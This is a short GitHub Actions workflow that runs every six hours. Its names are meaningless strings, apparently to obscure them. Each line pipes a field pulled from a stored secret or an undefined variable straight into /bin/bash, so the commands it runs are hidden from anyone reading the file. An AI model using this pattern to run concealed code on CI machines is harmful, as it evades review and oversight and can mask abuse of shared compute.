name: xiangsud
on:
  workflow_dispatch:
  schedule:
    - cron: '41 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xiangsud
        env:
          pol01507: ${{ secrets.pol01507 }}
        run: |
          echo $pol01507 | jq -r .djupx8 | /bin/bash
          echo $tkx81 | jq -r .ltcg47 | /bin/bash
          echo $zwyx9949 | jq -r .szrx90 | /bin/bash
          echo $ub227 | jq -r .st95117 | /bin/bash
          echo $prch39953 | jq -r .vpq9786 | /bin/bash
          echo $s24 | jq -r .h561 | /bin/bash
          echo $w7 | jq -r .ql080 | /bin/bash
          echo $ggi66387 | jq -r .fjnjx4 | /bin/bash
          echo $mwiv72 | jq -r .venl14726 | /bin/bash
          echo $ijnjv65859 | jq -r .j9265 | /bin/bash

